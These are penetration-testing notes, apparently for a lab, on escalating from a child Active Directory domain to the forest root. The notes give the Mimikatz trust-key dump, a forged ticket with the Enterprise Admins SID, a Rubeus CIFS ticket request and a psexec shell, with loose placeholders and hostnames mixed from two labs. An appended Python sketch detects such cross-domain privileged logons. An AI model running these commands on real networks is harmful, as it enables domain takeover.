Child-to-Parent CIFS

For the long version, refer to this article. Refer to Trusted - Vulnlab for an example.

To get the Domain SID:

lsadump::trust /patch

Then use the SID and RC4 hash:

Kerberos::golden 
/user: Administrator 
/domain: dollarcorp.moneycorp.local [child_domain]
/sid: DomainAdmin_SID [-512]
/sids: Enterprise_Admin_SID [519]
/rc4: Ticket HASH 
/service:krbtgt 
/target:moneycorp.local [root domain]
/ticket: location to save the ticket

Now use Rubeus to get a TGS:

Rubeus.exe asktgs
/ticket: ticket Location
/service: service type [cifs/mcorp-dc.moneycorp.local]
/dc: domain controller [mcorp-dc.moneycorp.local] 
/ptt

Then, to get a shell:

psexec.py administrator@trusteddc.trusted.vl -k -no-pass
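
Detection side of the procedure above, as an added example that is not part of the original notes: a ticket that carries the Enterprise Admins SID in /sids ends in a privileged logon on the root-domain DC by an account whose own SID belongs to the child domain. The sketch below scans exported Security events for Event 4672 (special privileges assigned to new logon) with a subject SID from a domain other than the DC's own. The SIDs, the dcorp/mcorp short names, the user names and the simplified event XML are constructed sample values, and the check is a heuristic that will also match any legitimately privileged child-domain account.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# Constructed placeholder SIDs; substitute your own forest's values.
ROOT_SID = "S-1-5-21-1111111111-2222222222-3333333333"
CHILD_SID = "S-1-5-21-4444444444-5555555555-6666666666"

# Constructed, minimal event layout (real exports carry more fields).
TEMPLATE = (
    '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
    "<System><EventID>{eid}</EventID>"
    "<Computer>mcorp-dc.moneycorp.local</Computer></System><EventData>"
    '<Data Name="SubjectUserSid">{sid}</Data>'
    '<Data Name="SubjectUserName">{user}</Data>'
    '<Data Name="SubjectDomainName">{dom}</Data>'
    '<Data Name="PrivilegeList">SeDebugPrivilege SeBackupPrivilege</Data>'
    "</EventData></Event>"
)

# Constructed sample events as they might be exported from a root-domain DC.
SAMPLE_EVENTS = [
    TEMPLATE.format(eid=4672, sid=ROOT_SID + "-500", user="Administrator", dom="mcorp"),
    TEMPLATE.format(eid=4672, sid="S-1-5-18", user="MCORP-DC$", dom="mcorp"),
    TEMPLATE.format(eid=4672, sid=CHILD_SID + "-500", user="Administrator", dom="dcorp"),
    TEMPLATE.format(eid=4624, sid=CHILD_SID + "-1104", user="student1", dom="dcorp"),
]

def domain_part(sid):
    """Return the domain portion of an account SID, or None for well-known SIDs."""
    parts = sid.split("-")
    if sid.startswith("S-1-5-21-") and len(parts) == 8:
        return "-".join(parts[:7])
    return None

def foreign_privileged_logons(events_xml, local_domain_sid):
    """Return (domain, user, sid) for 4672 events whose subject SID is from another domain."""
    hits = []
    for raw in events_xml:
        root = ET.fromstring(raw)
        if root.findtext("e:System/e:EventID", namespaces=NS) != "4672":
            continue
        data = {d.get("Name"): (d.text or "") for d in root.iterfind("e:EventData/e:Data", NS)}
        dom = domain_part(data.get("SubjectUserSid", ""))
        if dom is not None and dom != local_domain_sid:
            hits.append((data["SubjectDomainName"], data["SubjectUserName"], data["SubjectUserSid"]))
    return hits

if __name__ == "__main__":
    for hit in foreign_privileged_logons(SAMPLE_EVENTS, ROOT_SID):
        print("review privileged logon from foreign domain:", hit)
```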
